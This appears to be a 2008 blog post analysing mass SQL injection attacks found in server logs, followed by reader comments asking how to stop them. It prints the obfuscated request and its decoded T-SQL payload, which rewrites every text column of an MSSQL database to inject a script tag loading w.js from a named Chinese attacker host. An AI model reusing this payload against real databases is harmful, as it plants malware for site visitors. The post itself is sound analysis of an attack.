where's the salt?


SQL injection attacks: no end in sight? (30,998 views)


Just when I thought it would be over, there seems to be yet another massive wave of SQL injection attacks – presumably from newly infected servers.

UPDATE (8-23-2008): Looking for answers? Check Part 2
UPDATE (8-25-2008): Securing your forms to prevent future attacks

I am not worried, but I am annoyed. Because all these attempts seriously taint our log files and our analytics results. Besides causing unnecessary traffic.

But I am also very curious by nature and had an hour or so to kill, so I decided to look into it a bit.

Take the query string and translate it into human-readable format:

"GET /myfile.php?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x44
26C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1"

The Query String uses CAST to hide the actual SQL statement in hexadecimal code, so in order to *read* it, we need to translate the CAST content (everything else should be fairly easy to translate – %20 = space, etc).

The easiest way to do it is by using perl:

perl -pe 's/([A-Fa-f0-9][A-Fa-f0-9])/chr(hex($1))/ge' < in > out

The output is:

DECLARE @S CHAR(4000);SET@S=DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S)

(Of course sysobjects and syscolumns are tables found on MSSQL servers)

Other query strings found in our logs translated to other domain names, so far all of them were Chinese (.cn) TLDs, and all of them pointing to a script w.js in the directory /csrss (www2.1000ylc.cn/,sdo.1000mg.cn/, and others).

The host IP addresses could be traced to locations all over the world, and whether they’re legitimate or not doesn’t really matter.

If we try to access the above domain www0.douhunqn.cn, Firefox greets us with the following message:

Reported Attack Site

If you don’t know what you’re doing, I would strongly suggest that you DON’T try to access the site — I have a screenshot of the script here (click the image for a larger version):

But you can download a copy of the script (zipped) here (don’t say we didn’t warn you if something goes wrong) and trace all the URLs it is loading and accessing, check all the iframes it is generating and the files it is trying to download:
JavaScript File

The above is only one of many sites being used as the host for those malicious scripts, just Google the strings used in either the script or the SQL statement and you will see quite a bunch of infected pages.

(Visited 337 times, 1 visits today)


Date posted: Saturday, August 23rd, 2008 at 7:47 am (15 years, 10 months ago.)
Posted in: business mix, tech mix
Comments RSS Feed Comments RSS Feed

12 Responses to “SQL injection attacks: no end in sight?”

  1. 1

    we have had a similar problem over the past 4 days and have not been able to eliminate the threath? Is there anything anyone can suggest? we are running linux APAche 2.2x-PHP 5.2.6 with SQL 2005. The web server is trying to load certain pages on our site from Douhunqn and various sites from China. Is there anything we can do to stop this attack? the previous post does not describe how to stop the attack. Is it a virus? Is it malware? How do you stop SQL cross injections? DO you need to re-write out code and if we do how does it eliminate the client side “downloader” virus we are getting when we visit certain pages on our domain?

    Vatche on August 23rd, 2008 at 7:19 am
  2. 2

    I’m seeing the same problem over the past week. It seems to be growing as more server are getting infected with something that is appending the SQL onto the url.

    I’m going to try to block all url requests that contain the word ‘declair’, but I’m afraid I will be blocking readers who don’t realize the url their are following has the SQL added to them – and therefore they will become frustrated and stop reading my blog. So, I’m not sure what else to do. Maybe, I will try stripping the the SQL from the incoming urls.

    Curt on August 26th, 2008 at 8:19 pm
  3. 3

    we are facing similar problems. can i talk to someone in detail
    for the same?please contact me as its really urgent. its corrupts all columns. but what i am trying to say is how does it gets our sql serve
    sql server passwords an user ids?

    lets discuss and find a remedy.

    Kaycee on September 22nd, 2008 at 12:29 am
  4. 4


    Brian on September 26th, 2008 at 11:30 am
  5. 5

    The best thing to do is get your SQL DBAs involved and stop
    using dynamic SQL to get data. Use only stored procedures.

    Robert on October 2nd, 2008 at 4:58 am
  6. 6

    looks very interesting!
    bookmarked your blog.
    good luck!
    john brightman

    john brightman on May 24th, 2009 at 4:32 am
  7. 7

    It does work for me, thanks

    Mikayla on January 15th, 2010 at 3:46 am
  8. 8


    Fine Food on March 10th, 2010 at 6:12 am
  9. 9

    Great article! Subscribed to RSS, I will watch =)

    grand-gambler.com on April 1st, 2010 at 2:21 am
  10. 10

    Amiable post and this post helped me alot in my college assignement. Thanks you on your information.

    Wordpress Themes on April 10th, 2010 at 8:55 pm
  11. 11

    A good article Thank you!

    RFID Reader on April 18th, 2010 at 4:21 am
  12. 12

    I am very grateful to you. Many thanks.

    videodownloads on April 22nd, 2010 at 9:57 pm

Leave a Reply